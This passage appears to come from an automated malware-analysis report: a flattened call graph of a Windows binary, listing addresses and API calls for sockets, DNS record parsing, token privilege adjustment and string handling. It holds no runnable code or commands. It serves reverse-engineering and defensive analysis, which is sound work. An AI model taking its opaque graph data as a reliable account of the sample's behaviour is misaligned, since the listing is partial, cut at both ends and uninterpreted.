10754 1314bd9f 10739->10754 10741 1314bdae getsockopt GetTickCount 10740->10741 10740->10754 10742 13142f79 lstrlenA 10741->10742 10743 1314bdfa 10742->10743 10744 131506ce 2 API calls 10743->10744 10745 1314be08 10744->10745 10746 13142f79 lstrlenA 10745->10746 10747 1314be1b 10746->10747 10748 131506ce 2 API calls 10747->10748 10752 1314be29 10748->10752 10749 1314be76 10751 1314b0d3 24 API calls 10749->10751 10750 1314be5e 11134 131513cf EnterCriticalSection 10750->11134 10751->10754 10752->10749 10752->10750 10752->10754 10754->10591 10755 1314be68 10756 1315185f 12 API calls 10755->10756 10756->10754 10758 13144eb2 10757->10758 10759 13144ea8 EnterCriticalSection 10757->10759 10758->10584 10759->10758 10761 1314beb3 10760->10761 10765 1314beab 10760->10765 10762 1314bec3 GetTickCount 10761->10762 10761->10765 10764 1314bf1f 10762->10764 10763 13145006 3 API calls 10763->10764 10764->10763 10764->10765 10766 1314bee2 recv WSAGetLastError 10764->10766 10769 1314bf86 10764->10769 10770 1314bf9c 10764->10770 10765->10591 10766->10764 10767 1314bf03 ioctlsocket 10766->10767 10767->10764 10768 1314bf7d WSAGetLastError 10767->10768 10768->10765 10771 13144c1f ctype 3 API calls 10769->10771 10772 1314bfa4 lstrlenA 10770->10772 10773 1314c02c 10770->10773 10771->10765 10772->10765 10776 1314bfd7 10772->10776 10773->10765 10774 13144c1f ctype 3 API calls 10773->10774 10774->10765 10777 13145006 3 API calls 10776->10777 10778 1314bfe4 10777->10778 10779 13144c1f ctype 3 API calls 10778->10779 10779->10765 10781 1314b0e4 10780->10781 10796 1314b105 10780->10796 10782 1314b107 10781->10782 10783 1314b0f0 10781->10783 10785 13142f79 lstrlenA 10782->10785 10795 1314b112 10782->10795 10784 131513cf 7 API calls 10783->10784 10786 1314b0f9 10784->10786 10787 1314b123 10785->10787 10789 1315185f 12 API calls 10786->10789 10790 131506ce 2 API calls 10787->10790 10788 131513cf 7 API calls 10791 1314b14c 10788->10791 10789->10796 10792 1314b12f 10790->10792 10793 1315185f 12 API calls 10791->10793 10794 1314b135 10792->10794 10792->10795 10793->10796 11181 1314afff 10794->11181 10795->10788 10796->10591 10799 1314b1c1 10798->10799 10800 1314b1c5 10798->10800 10799->10591 10800->10799 10801 1314b1f1 StrStrA 10800->10801 10802 1314b222 10801->10802 10804 1314b203 10801->10804 10802->10591 10803 1314b215 StrStrA 10803->10802 10803->10804 10804->10802 10804->10803 10806 13151876 LeaveCriticalSection 10805->10806 10808 13151887 10805->10808 10806->10584 10808->10806 10809 13144c6b ctype 3 API calls 10808->10809 10810 131518b7 10809->10810 10811 13151183 10 API calls 10810->10811 10812 131518bf 10811->10812 10813 13144c6b ctype 3 API calls 10812->10813 10813->10806 10815 1314bc06 10814->10815 10816 1314bc0d 10814->10816 10815->10591 10816->10815 10817 13150d2c 3 API calls 10816->10817 10818 1314bc3e 10817->10818 10819 1314bcd5 10818->10819 10820 13142f79 lstrlenA 10818->10820 10821 13142f79 lstrlenA 10819->10821 10822 1314bc62 10820->10822 10823 1314bce2 10821->10823 10824 131506ce 2 API calls 10822->10824 10825 131506ce 2 API calls 10823->10825 10827 1314bc6e 10824->10827 10826 1314bcee 10825->10826 10826->10815 10829 131513cf 7 API calls 10826->10829 10827->10819 10828 1314bc73 10827->10828 10830 1314bc9f 10828->10830 11203 131515a7 EnterCriticalSection 10828->11203 10829->10815 10830->10815 10832 1314bcbf GetTickCount 10830->10832 10832->10815 10834 13142f79 lstrlenA 10833->10834 10835 1314bd3d 10834->10835 10836 131506ce 2 API calls 10835->10836 10837 1314bd4c setsockopt setsockopt connect 10836->10837 10837->10585 10839 1314c14b 10838->10839 10840 1314c152 10838->10840 10839->10584 10840->10839 10841 1314c1c0 10840->10841 10842 1314c58e 10840->10842 10845 1314c1c2 10841->10845 10846 1314c1e3 10841->10846 10843 1314c597 10842->10843 10844 1314cc2c 10842->10844 10848 1314ca6a 10843->10848 10851 1314c59e 10843->10851 10849 13144c1f ctype 3 API calls 10844->10849 10847 1314c1c9 10845->10847 10845->10848 11237 1314aee7 10846->11237 10860 1314c5bb 10847->10860 10867 13150d2c 3 API calls 10847->10867 11026 1314c1de 10847->11026 11119 1314c1d0 10847->11119 10852 13142f79 lstrlenA 10848->10852 10853 1314cc37 10849->10853 10851->10847 10855 1314ca4c 10851->10855 10857 1314ca7d 10852->10857 10878 13144c1f ctype 3 API calls 10853->10878 10861 13144c1f ctype 3 API calls 10855->10861 10856 1314c1d7 10875 13144c1f ctype 3 API calls 10856->10875 10856->11026 10863 131506ce 2 API calls 10857->10863 10858 1314c1f1 10865 131513cf 7 API calls 10858->10865 10859 1314c23e 11252 13149014 10859->11252 10868 13144c1f ctype 3 API calls 10860->10868 10889 1314caae 10860->10889 10862 1314ca5a 10861->10862 10890 13142f79 lstrlenA 10862->10890 10871 1314ca89 10863->10871 10864 1314c207 10876 13151bd5 3 API calls 10864->10876 10874 1314c1fb 10865->10874 10867->10860 10877 1314c5d1 10868->10877 10869 1314c805 10873 131517c9 3 API calls 10869->10873 10869->10889 10870 13150d2c 3 API calls 10880 1314c7f1 10870->10880 10881 1314ca9d 10871->10881 11423 13151330 EnterCriticalSection LeaveCriticalSection 10871->11423 10872 13144c1f ctype 3 API calls 10882 1314ccb5 10872->10882 10884 1314c831 10873->10884 10885 1315185f 12 API calls 10874->10885 10886 1314c986 10875->10886 10888 1314c20f 10876->10888 10906 13151a34 4 API calls 10877->10906 10883 1314cc57 10878->10883 10880->10869 10880->10889 10910 131515a7 12 API calls 10880->10910 10893 1314cafb 10881->10893 10901 13150d2c 3 API calls 10881->10901 10892 131519f6 3 API calls 10882->10892 10898 13144c1f ctype 3 API calls 10883->10898 10884->10889 10894 1314c839 10884->10894 10885->10864 10895 13142f79 lstrlenA 10886->10895 10887 13144c1f ctype 3 API calls 10899 1314c254 10887->10899 10897 13151bd5 3 API calls 10888->10897 10896 131513cf 7 API calls 10889->10896 11049 1314c584 10890->11049 10900 1314ccc3 10892->10900 10920 13149014 7 API calls 10893->10920 10902 13142f79 lstrlenA 10894->10902 10903 1314c996 10895->10903 10904 1314cab8 10896->10904 10905 1314c217 10897->10905 10907 1314cc62 10898->10907 10908 13149014 7 API calls 10899->10908 10911 13151a34 4 API calls 10900->10911 10912 1314caaa 10901->10912 10913 1314c84c 10902->10913 10914 13151a34 4 API calls 10903->10914 10915 1315185f 12 API calls 10904->10915 10916 13151bd5 3 API calls 10905->10916 10917 1314c5e3 10906->10917 10918 13144c1f ctype 3 API calls 10907->10918 10919 1314c261 10908->10919 10909 13151a34 4 API calls 10909->11026 10910->10869 10911->10864 10912->10889 10912->10893 10922 13151a78 9 API calls 10913->10922 10923 1314c9a2 10914->10923 10924 1314cac4 10915->10924 10925 1314c21f 10916->10925 10926 13145107 2 API calls 10917->10926 10927 1314cc6d 10918->10927 10921 13149014 7 API calls 10919->10921 10928 1314cb24 10920->10928 10929 1314c26e 10921->10929 10930 1314c85e 10922->10930 10939 13144c1f ctype 3 API calls 10923->10939 10923->11026 10931 13151bd5 3 API calls 10924->10931 10932 13151bd5 3 API calls 10925->10932 10933 1314c5eb 10926->10933 10934 13144c1f ctype 3 API calls 10927->10934 10935 1314cb35 10928->10935 10936 1314cba2 10928->10936 10937 13149014 7 API calls 10929->10937 10938 13149014 7 API calls 10930->10938 10940 1314cacc 10931->10940 10941 1314c227 10932->10941 10949 13149014 7 API calls 10933->10949 11045 1314c65a 10933->11045 10934->10862 10942 13142f79 lstrlenA 10935->10942 10950 13142f79 lstrlenA 10936->10950 10943 1314c27b 10937->10943 10945 1314c86b 10938->10945 10946 1314c9c8 10939->10946 10947 13151bd5 3 API calls 10940->10947 10948 13151bd5 3 API calls 10941->10948 10951 1314cb42 10942->10951 10952 13144c1f ctype 3 API calls 10943->10952 10944 13144c1f ctype 3 API calls 10953 1314c66b 10944->10953 10954 13147b04 54 API calls 10945->10954 10955 131519f6 3 API calls 10946->10955 10956 1314cad4 10947->10956 10957 1314c22f 10948->10957 10958 1314c601 StrStrA 10949->10958 10959 1314cbaf 10950->10959 10960 131506ce 2 API calls 10951->10960 10961 1314c289 10952->10961 10962 13142f79 lstrlenA 10953->10962 10963 1314c87e 10954->10963 10964 1314c9d7 10955->10964 10965 13151bd5 3 API calls 10956->10965 10966 13151bd5 3 API calls 10957->10966 10967 1314c619 10958->10967 10958->11045 10968 131506ce 2 API calls 10959->10968 10995 1314cb4e 10960->10995 11258 13151a34 lstrlenA 10961->11258 10970 1314c67b 10962->10970 10971 13144c1f ctype 3 API calls 10963->10971 10972 13142f79 lstrlenA 10964->10972 10973 1314cadc 10965->10973 10966->10839 10974 13149014 7 API calls 10967->10974 10968->10995 11390 13146b8b 10970->11390 10977 1314c88f 10971->10977 10978 1314c9ff 10972->10978 10979 13151bd5 3 API calls 10973->10979 10980 1314c62b 10974->10980 10975 1314c297 StrStrA 10981 1314c2ac 10975->10981 11059 1314c2ed 10975->11059 10983 13151a34 4 API calls 10977->10983 10984 13151a78 9 API calls 10978->10984 10985 1314cae4 10979->10985 10986 13149014 7 API calls 10980->10986 10987 13149014 7 API calls 10981->10987 10982 1314c687 10988 1314c6a9 10982->10988 10997 13147b04 54 API calls 10982->10997 10990 1314c89d 10983->10990 10992 1314ca19 10984->10992 10993 13151bd5 3 API calls 10985->10993 11010 1314c638 10986->11010 10996 1314c2be 10987->10996 11005 13142f79 lstrlenA 10988->11005 11016 1314c6ae 10988->11016 10989 1314cb89 10994 13145107 2 API calls 10989->10994 11006 13144c1f ctype 3 API calls 10990->11006 10990->11026 10991 13149014 7 API calls 10998 1314c328 10991->10998 10999 13144c1f ctype 3 API calls 10992->10999 11000 1314caec 10993->11000 11001 1314cbdf 10994->11001 10995->10989 11003 13142f79 lstrlenA 10995->11003 11002 13149014 7 API calls 10996->11002 11004 1314c69d 10997->11004 11007 13149014 7 API calls 10998->11007 11008 1314ca27 10999->11008 11009 13151bd5 3 API calls 11000->11009 11012 13149014 7 API calls 11001->11012 11013 1314c2cb 11002->11013 11014 1314cb67 11003->11014 11015 13151a34 4 API calls 11004->11015 11005->11016 11018 1314c8cb 11006->11018 11019 1314c335 11007->11019 11020 131519f6 3 API calls 11008->11020 11009->10839 11011 13149014 7 API calls 11010->11011 11021 1314c649 11011->11021 11022 1314cbed 11012->11022 11034 13149014 7 API calls 11013->11034 11023 13146b8b 11 API calls 11014->11023 11015->10988 11017 13145107 2 API calls 11016->11017 11024 1314c6cc 11017->11024 11025 131519f6 3 API calls 11018->11025 11030 1314c3d0 11019->11030 11031 13144c1f ctype 3 API calls 11019->11031 11020->11026 11037 13149014 7 API calls 11021->11037 11027 1314cc00 11022->11027 11032 13144c1f ctype 3 API calls 11022->11032 11028 1314cb73 11023->11028 11029 13149014 7 API calls 11024->11029 11079 1314c8da 11025->11079 11026->10864 11026->10872 11033 13147b04 54 API calls 11027->11033 11028->10989 11040 13147b04 54 API calls 11028->11040 11035 1314c6db 11029->11035 11041 13149014 7 API calls 11030->11041 11036 1314c356 11031->11036 11032->11027 11038 1314cc16 11033->11038 11039 1314c2dc 11034->11039 11042 13144c1f ctype 3 API calls 11035->11042 11044 13151a34 4 API calls 11036->11044 11037->11045 11046 13144c1f ctype 3 API calls 11038->11046 11053 13149014 7 API calls 11039->11053 11040->10989 11047 1314c3f7 11041->11047 11048 1314c6e9 11042->11048 11043 131517c9 3 API calls 11043->11079 11057 1314c364 11044->11057 11045->10944 11046->11049 11050 13142f79 lstrlenA 11047->11050 11051 13142f79 lstrlenA 11048->11051 11049->10909 11054 1314c40a 11050->11054 11055 1314c6f9 11051->11055 11052 13142f79 lstrlenA 11052->11079 11053->11059 11060 13149014 7 API calls 11054->11060 11061 13146b8b 11 API calls 11055->11061 11056 13151a78 9 API calls 11056->11079 11058 1314c3dc 11057->11058 11070 1314c383 11057->11070 11063 13142f79 lstrlenA 11058->11063 11059->10991 11064 1314c418 11060->11064 11062 1314c705 11061->11062 11065 1314c727 11062->11065 11068 13147b04 54 API calls 11062->11068 11063->11030 11067 13142f79 lstrlenA 11064->11067 11069 1314c72c 11065->11069 11075 13142f79 lstrlenA 11065->11075 11066 13149014 7 API calls 11066->11079 11071 1314c448 11067->11071 11073 1314c71b 11068->11073 11080 13145107 2 API calls 11069->11080 11076 1314c3be 11070->11076 11081 13142f79 lstrlenA 11070->11081 11267 13151a78 11071->11267 11078 13151a34 4 API calls 11073->11078 11074 13147b04 54 API calls 11074->11079 11075->11069 11262 131517c9 EnterCriticalSection 11076->11262 11078->11065 11079->10856 11079->11043 11079->11052 11079->11056 11079->11066 11079->11074 11088 13151a34 HeapAlloc IsBadReadPtr HeapReAlloc lstrlenA 11079->11088 11084 1314c74a 11080->11084 11081->11076 11083 13149014 7 API calls 11085 1314c464 11083->11085 11086 13149014 7 API calls 11084->11086 11087 13149014 7 API calls 11085->11087 11089 1314c75b 11086->11089 11090 1314c473 11087->11090 11088->11079 11091 13149014 7 API calls 11089->11091 11093 1314c768 11091->11093 11095 13147b04 54 API calls 11093->11095 11097 1314c77b 11095->11097 11119->10856 11119->10869 11119->10870 11126 1314c0d7 11125->11126 11130 1314c0d3 11125->11130 11127 13144d5c IsBadReadPtr 11126->11127 11126->11130 11129 1314c0eb 11127->11129 11128 1314c0fc send 11128->11129 11128->11130 11129->11128 11129->11130 11130->10591 11132 13144c1f ctype 3 API calls 11131->11132 11133 13151bdf 11132->11133 11133->10584 11136 13151406 11134->11136 11142 131513f2 LeaveCriticalSection 11134->11142 11138 13151436 11136->11138 11136->11142 11145 13151365 EnterCriticalSection 11136->11145 11139 13142f79 lstrlenA 11138->11139 11138->11142 11140 1315144a 11139->11140 11141 131506ce 2 API calls 11140->11141 11143 13151459 11141->11143 11142->10755 11143->11142 11150 13150da2 11143->11150 11146 13151391 11145->11146 11147 13151380 LeaveCriticalSection 11145->11147 11146->11147 11149 13150da2 3 API calls 11146->11149 11147->11138 11149->11146 11151 13150db8 11150->11151 11180 13150db1 11150->11180 11152 13150e56 11151->11152 11153 13150de8 11151->11153 11151->11180 11154 13150ec9 11152->11154 11155 13150e5b 11152->11155 11156 13150e0f 11153->11156 11159 13142f79 lstrlenA 11153->11159 11157 13150f08 11154->11157 11163 13150ed3 11154->11163 11158 13150e82 11155->11158 11164 13142f79 lstrlenA 11155->11164 11161 13142f79 lstrlenA 11156->11161 11156->11180 11162 13150f2f 11157->11162 11169 13142f79 lstrlenA 11157->11169 11167 13142f79 lstrlenA 11158->11167 11158->11180 11160 13150e00 11159->11160 11166 131506ce 2 API calls 11160->11166 11168 13150e32 11161->11168 11171 13142f79 lstrlenA 11162->11171 11162->11180 11170 13150c26 3 API calls 11163->11170 11165 13150e73 11164->11165 11172 131506ce 2 API calls 11165->11172 11166->11156 11173 13150ea5 11167->11173 11174 131506ce 2 API calls 11168->11174 11175 13150f20 11169->11175 11170->11180 11176 13150f59 11171->11176 11172->11158 11177 131506ce 2 API calls 11173->11177 11174->11180 11178 131506ce 2 API calls 11175->11178 11179 131506ce 2 API calls 11176->11179 11177->11180 11178->11162 11179->11180 11180->11143 11182 1314b00f 11181->11182 11202 1314b0cb 11181->11202 11183 1314b020 11182->11183 11185 131513cf 7 API calls 11182->11185 11184 1314eac9 8 API calls 11183->11184 11186 1314b02b 11184->11186 11185->11183 11187 1314b040 IsBadReadPtr 11186->11187 11188 13144c1f ctype 3 API calls 11186->11188 11189 1314b052 11187->11189 11190 1314b05a 11187->11190 11191 1314b03d 11188->11191 11192 13144c1f ctype 3 API calls 11189->11192 11193 1314ea4e 7 API calls 11190->11193 11191->11187 11192->11190 11194 1314b073 11193->11194 11195 13144c1f ctype 3 API calls 11194->11195 11196 1314b0aa 11195->11196 11197 13144c1f ctype 3 API calls 11196->11197 11198 1314b0b5 11197->11198 11199 13144c1f ctype 3 API calls 11198->11199 11200 1314b0c0 11199->11200 11201 13144c1f ctype 3 API calls 11200->11201 11201->11202 11202->10796 11204 13144c1f ctype 3 API calls 11203->11204 11205 131515d2 11204->11205 11206 13150d2c 3 API calls 11205->11206 11207 131515e8 11206->11207 11208 131515ec LeaveCriticalSection 11207->11208 11209 131515fa 11207->11209 11210 131515f5 11208->11210 11211 1315160d LeaveCriticalSection 11209->11211 11212 1315161a 11209->11212 11210->10830 11211->11210 11213 13142f79 lstrlenA 11212->11213 11214 1315162d 11213->11214 11215 131506ce 2 API calls 11214->11215 11216 13151639 11215->11216 11217 13142f79 lstrlenA 11216->11217 11218 1315164e 11217->11218 11219 131506ce 2 API calls 11218->11219 11220 1315165a 11219->11220 11221 13142f79 lstrlenA 11220->11221 11222 13151675 11221->11222 11223 131506ce 2 API calls 11222->11223 11224 13151681 11223->11224 11225 13142f79 lstrlenA 11224->11225 11226 131516a5 11225->11226 11227 131506ce 2 API calls 11226->11227 11228 131516b1 11227->11228 11229 13142f79 lstrlenA 11228->11229 11230 131516cb 11229->11230 11231 131506ce 2 API calls 11230->11231 11236 131516d7 11231->11236 11232 131517b4 11233 13150c26 3 API calls 11233->11236 11234 13150da2 3 API calls 11234->11236 11235 13145006 3 API calls 11235->11236 11236->11232 11236->11233 11236->11234 11236->11235 11238 1314aeff lstrlenA 11237->11238 11239 1314aef8 11237->11239 11244 1314af21 11238->11244 11245 1314af5c 11238->11245 11239->10858 11239->10859 11240 131517c9 3 API calls 11240->11244 11241 1314afab 11243 13144f66 HeapAlloc 11241->11243 11242 131517c9 3 API calls 11242->11245 11246 1314afc5 lstrcpyA 11243->11246 11244->11239 11244->11240 11244->11245 11424 1314ae51 11244->11424 11245->11239 11245->11241 11245->11242 11250 1314ae51 10 API calls 11245->11250 11246->11239 11247 1314afd6 11246->11247 11249 13142f79 lstrlenA 11247->11249 11251 1314afe3 lstrcatA lstrcatA 11249->11251 11250->11245 11251->11239 11253 1314903c 11252->11253 11254 1314901d 11252->11254 11253->10887 11254->11253 11432 13148d18 11254->11432 11259 13151a48 11258->11259 11261 13151a5b 11258->11261 11260 13145006 3 API calls 11259->11260 11260->11261 11261->10975 11263 131517e3 LeaveCriticalSection 11262->11263 11266 131517f1 11262->11266 11264 131517ec 11263->11264 11264->11030 11265 131517fa LeaveCriticalSection 11265->11264 11266->11265 11268 13151a8c 11267->11268 11274 1314c457 11267->11274 11269 13151aab 11268->11269 11270 13144c1f ctype 3 API calls 11268->11270 11268->11274 11271 13144fe4 HeapAlloc 11269->11271 11270->11269 11272 13151ab5 StrStrA 11271->11272 11273 13151bbe lstrlenA 11272->11273 11278 13151add 11272->11278 11273->11274 11274->11083 11391 13146b97 11390->11391 11392 13146b9b 11390->11392 11391->10982 11393 13142f79 lstrlenA 11392->11393 11398 13146ba3 11392->11398 11394 13146bb6 lstrcmpA 11393->11394 11395 13146bd1 11394->11395 11394->11398 11396 13142f79 lstrlenA 11395->11396 11397 13146bdb lstrcmpA 11396->11397 11397->11398 11399 13146bec 11397->11399 11398->10982 11400 13142f79 lstrlenA 11399->11400 11401 13146bf6 lstrcmpA 11400->11401 11401->11398 11402 13146c07 lstrcmpA 11401->11402 11402->11398 11403 13146c17 11402->11403 11404 13142f79 lstrlenA 11403->11404 11405 13146c21 lstrcmpA 11404->11405 11405->11398 11406 13146c2f 11405->11406 11407 13142f79 lstrlenA 11406->11407 11408 13146c39 lstrcmpA 11407->11408 11408->11398 11409 13146c47 11408->11409 11410 13142f79 lstrlenA 11409->11410 11411 13146c51 lstrcmpA 11410->11411 11411->11398 11412 13146c5f 11411->11412 11413 13142f79 lstrlenA 11412->11413 11414 13146c69 lstrcmpA 11413->11414 11414->11398 11415 13146c77 11414->11415 11416 13142f79 lstrlenA 11415->11416 11423->10881 11425 1314ae5f 11424->11425 11426 1314ae5b 11424->11426 11425->11426 11427 1314ae69 lstrlenA 11425->11427 11426->11244 11428 13144f9e 3 API calls 11427->11428 11429 1314ae98 11428->11429 11430 1314aea7 lstrcatA 11429->11430 11431 1314aeaf lstrcatA lstrcatA lstrcatA lstrcatA lstrcatA 11429->11431 11430->11431 11431->11244 11433 13148df1 11432->11433 11440 13148d2c 11432->11440 11442 13146f21 11433->11442 11434 13148da9 11435 13144c1f ctype 3 API calls 11434->11435 11436 13148db9 11435->11436 11437 13144c1f ctype 3 API calls 11436->11437 11439 13148de1 11437->11439 11438 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 11438->11440 11441 13144c1f ctype 3 API calls 11439->11441 11440->11434 11440->11438 11441->11433 11443 13146f31 11442->11443 11444 13146f2d 11442->11444 11443->11444 11445 13145006 3 API calls 11443->11445 11444->11253 11446 13146f5b 11445->11446 11446->11444 11447 13144fe9 HeapAlloc 11446->11447 11448 13146f79 11447->11448 11448->11444 11449 13145107 2 API calls 11448->11449 11449->11444 11504 131441c2 11503->11504 11505 131441c9 11503->11505 11504->10601 11505->11504 11506 13144d5c IsBadReadPtr 11505->11506 11507 1314421c 11506->11507 11507->11504 11526 13143635 11507->11526 11510 13144234 11510->11504 11511 1314427d 11510->11511 11533 13143ec5 11510->11533 11511->11504 11564 1314369d 11511->11564 11514 13143dcf 11513->11514 11515 13143dc7 Sleep 11514->11515 11516 13143dd7 11514->11516 11515->11514 11516->10633 11518 13143e37 11517->11518 11519 13143e3d Sleep 11518->11519 11523 13143e50 11518->11523 11519->11518 11520 13143eab 11521 13144c1f ctype 3 API calls 11520->11521 11522 13143eb8 11521->11522 11522->10624 11523->11520 11524 1314eac9 8 API calls 11523->11524 11525 13144c1f ctype 3 API calls 11523->11525 11524->11523 11525->11523 11527 13144ea1 EnterCriticalSection 11526->11527 11530 13143643 11527->11530 11528 13143674 11531 13144eb3 LeaveCriticalSection 11528->11531 11529 13143659 lstrcmpA 11529->11528 11529->11530 11530->11528 11530->11529 11532 13143696 11531->11532 11532->11510 11534 13143ed6 11533->11534 11535 13143edd 11533->11535 11534->11510 11535->11534 11536 13143ee7 IsBadReadPtr 11535->11536 11536->11534 11537 13143ef4 11536->11537 11538 13144fe9 HeapAlloc 11537->11538 11539 13143f01 11538->11539 11540 13144fe9 HeapAlloc 11539->11540 11541 13143f11 11540->11541 11542 13143f29 htons htons 11541->11542 11543 13143f7d 11542->11543 11544 13143f5a 11542->11544 11546 1314407f socket setsockopt GetTickCount sendto 11543->11546 11545 13143f65 Sleep 11544->11545 11545->11543 11547 13144145 11546->11547 11548 131440d0 GetTickCount 11546->11548 11550 13144c1f ctype 3 API calls 11547->11550 11549 131440db recvfrom 11548->11549 11551 131440ff 11549->11551 11552 13144150 11550->11552 11551->11549 11555 1314411b GetLastError 11551->11555 11558 13144f9e 3 API calls 11551->11558 11553 13144161 11552->11553 11554 13144159 closesocket 11552->11554 11556 13144176 11553->11556 11557 13144166 11553->11557 11554->11553 11555->11547 11559 13144125 closesocket Sleep 11555->11559 11577 13143962 11556->11577 11560 13144c1f ctype 3 API calls 11557->11560 11558->11551 11559->11546 11559->11547 11560->11534 11563 13144c1f ctype 3 API calls 11563->11534 11565 13144ea1 EnterCriticalSection 11564->11565 11566 131436a9 11565->11566 11567 131436c4 11566->11567 11568 131436b6 11566->11568 11569 13144dc2 2 API calls 11567->11569 11570 13144eb3 LeaveCriticalSection 11568->11570 11571 131436dd 11569->11571 11572 131436c1 11570->11572 11573 13144fe9 HeapAlloc 11571->11573 11572->11504 11574 131436f8 11573->11574 11575 13144eb3 LeaveCriticalSection 11574->11575 11576 13143723 11575->11576 11576->11504 11578 1314397d 11577->11578 11582 13143976 11577->11582 11579 131439f8 DnsExtractRecordsFromMessage_W 11578->11579 11580 13143a34 11579->11580 11603 13143a1c 11579->11603 11580->11603 11629 131437a0 11580->11629 11582->11563 11585 13143be1 11587 131437a0 9 API calls 11585->11587 11586 13143a6c 11619 13143a74 11586->11619 11638 13143899 11586->11638 11588 13143bf2 11587->11588 11590 13143c17 11588->11590 11591 13143bff 11588->11591 11595 131437a0 9 API calls 11590->11595 11594 13143921 DnsRecordListFree 11591->11594 11592 13143921 DnsRecordListFree 11592->11582 11594->11582 11599 13143c28 11595->11599 11596 13143ac7 11601 13144c1f ctype 3 API calls 11596->11601 11597 13143a9a 11597->11596 11600 13144c1f ctype 3 API calls 11597->11600 11598 13143add 11602 13142f79 lstrlenA 11598->11602 11606 13143b35 11598->11606 11599->11603 11605 13143899 6 API calls 11599->11605 11600->11597 11601->11603 11604 13143af5 lstrcmpA 11602->11604 11626 13143921 11603->11626 11604->11606 11609 13144d5c IsBadReadPtr 11606->11609 11606->11619 11620 13143b88 11606->11620 11609->11606 11619->11592 11627 13144d0b 11626->11627 11628 13143932 DnsRecordListFree 11627->11628 11628->11582 11630 131437b0 11629->11630 11631 131437ce lstrcmpiA 11630->11631 11632 13143728 IsBadReadPtr lstrlenW 11630->11632 11633 13145006 HeapAlloc IsBadReadPtr HeapReAlloc 11630->11633 11634 13144d5c IsBadReadPtr 11630->11634 11635 1314388e 11630->11635 11636 13144fe9 HeapAlloc 11630->11636 11637 13144dc2 2 API calls 11630->11637 11631->11630 11632->11630 11633->11630 11634->11630 11635->11585 11635->11586 11636->11630 11637->11630 11642 131438ac 11638->11642 11639 13143919 11639->11597 11639->11598 11641 131438d0 lstrcmpiA 11641->11642 11642->11639 11643 13145006 3 API calls 11642->11643 11650 13143728 IsBadReadPtr 11642->11650 11643->11642 11651 1314373e 11650->11651 11652 1314373a 11650->11652 11653 13143744 lstrlenW 11651->11653 11654 13143751 11651->11654 11652->11641 11653->11654 11654->11641 11656 1314517f 11655->11656 11657 1314517b 11655->11657 11658 13142f79 lstrlenA 11656->11658 11657->10264 11659 13145190 LookupPrivilegeValueA 11658->11659 11660 131451a0 CloseHandle 11659->11660 11661 131451ab AdjustTokenPrivileges GetLastError 11659->11661 11660->11657 11661->10264 11663 1314ffd9 11662->11663 11663->10286 11665 13145b98 11664->11665 11676 13145bd8 11664->11676 11666 13144fe9 HeapAlloc 11665->11666 11667 13145ba3 11666->11667 11671 13144fe9 HeapAlloc 11667->11671 11667->11676 11668 1314601e 11669 13144c1f ctype 3 API calls 11668->11669 11670 13146029 11669->11670 11673 13146088 11670->11673 11675 13145006 3 API calls 11670->11675 11671->11667 11672 13142f79 lstrlenA 11680 13145e54 11672->11680 11673->10310 11674 131506ce 2 API calls 11674->11680 11677 1314604d 11675->11677 11676->11680 11682 13142f79 lstrlenA 11676->11682 11683 13145006 3 API calls 11676->11683 11684 131506ce lstrcmpA lstrcmpA 11676->11684 11686 13145107 2 API calls 11676->11686 11774 13150f81 11676->11774 11679 13144c1f ctype 3 API calls 11677->11679 11679->11673 11680->11668 11680->11672 11680->11674 11681 13144c1f ctype 3 API calls 11680->11681 11685 13145006 HeapAlloc IsBadReadPtr HeapReAlloc 11680->11685 11681->11680 11682->11676 11683->11676 11684->11676 11685->11680 11687 13145dcc lstrlenA 11686->11687 11688 13144fe9 HeapAlloc 11687->11688 11688->11676 11690 1314d186 getsockname 11689->11690 11691 1314d1a4 11689->11691 11690->11691 11691->10310 11780 13151ca4 11692->11780 11694 1314daf9 11695 13151ca4 HeapAlloc 11694->11695 11696 1314db07 11695->11696 11784 13151ce4 11696->11784 11698 1314db10 11699 13151bd5 3 API calls 11698->11699 11700 1314db18 11699->11700 11787 1315099d 11700->11787 11702 1314db23 11703 13151ca4 HeapAlloc 11702->11703 11704 1314db33 11703->11704 11705 13151ce4 3 API calls 11704->11705 11706 1314db3f send 11705->11706 11707 1314db57 11706->11707 11708 1314db6e 11706->11708 11710 13151bd5 3 API calls 11707->11710 11709 13144fe4 HeapAlloc 11708->11709 11711 1314db75 11709->11711 11712 1314db5f 11710->11712 11735 1314db83 11711->11735 11791 13151c73 11711->11791 11713 13151bd5 3 API calls 11712->11713 11732 1314db67 11713->11732 11715 1314db8b recv 11716 1314dc3b 11715->11716 11715->11735 11717 13151bd5 3 API calls 11716->11717 11718 1314dc42 11717->11718 11719 13144c6b ctype 3 API calls 11718->11719 11721 1314dc48 11719->11721 11720 1314dc22 11722 1314dc37 11720->11722 11799 131509ca 11720->11799 11724 13151bd5 3 API calls 11721->11724 11726 13151bd5 3 API calls 11722->11726 11728 1314dc64 11724->11728 11729 1314dc7d 11726->11729 11727 1314dbef recv 11727->11735 11731 13151bd5 3 API calls 11728->11731 11730 13151bd5 3 API calls 11729->11730 11730->11732 11731->11732 11732->10291 11733 13151bd5 3 API calls 11733->11735 11734 13144c6b ctype 3 API calls 11734->11735 11735->11715 11735->11720 11735->11721 11735->11722 11735->11727 11735->11733 11735->11734 11794 13151d27 11735->11794 11798 1314cfd8 getsockopt 11735->11798 11738 1314dff2 11737->11738 11739 1314dfa9 11737->11739 11742 1314df53 21 API calls 11738->11742 11751 1314dfc3 11738->11751 11740 1314dfac 11739->11740 11741 1314dfe9 11739->11741 11744 1314dfe1 11740->11744 11745 1314dfb1 11740->11745 11928 1314d1ba GetVersion 11741->11928 11742->11751 11743 13151bd5 3 API calls 11747 1314e006 11743->11747 11923 1314d25f 11744->11923 11749 1314dfb4 11745->11749 11750 1314dfd5 11745->11750 11752 13144c6b ctype 3 API calls 11747->11752 11754 1314dfb7 11749->11754 11755 1314dfcd 11749->11755 11918 1314d522 11750->11918 11751->11743 11757 1314e00c 11752->11757 11758 1314dfc5 11754->11758 11759 1314dfba 11754->11759 11876 1314d8e2 11755->11876 11757->10291 11829 1314dc89 11758->11829 11759->11751 11803 1314d564 11759->11803 11763 1314df60 11762->11763 11764 1314df6b 11762->11764 12514 13151988 11763->12514 11766 13144fe4 HeapAlloc 11764->11766 11768 1314df73 11766->11768 11767 1314df65 11769 13144c6b ctype 3 API calls 11767->11769 11770 1314df80 11768->11770 11771 1315112e 2 API calls 11768->11771 11769->11764 12522 1314ac32 11770->12522 11771->11770 11773 1314df93 11773->11773 11775 1315101d 11774->11775 11778 13150f94 11774->11778 11775->11676 11776 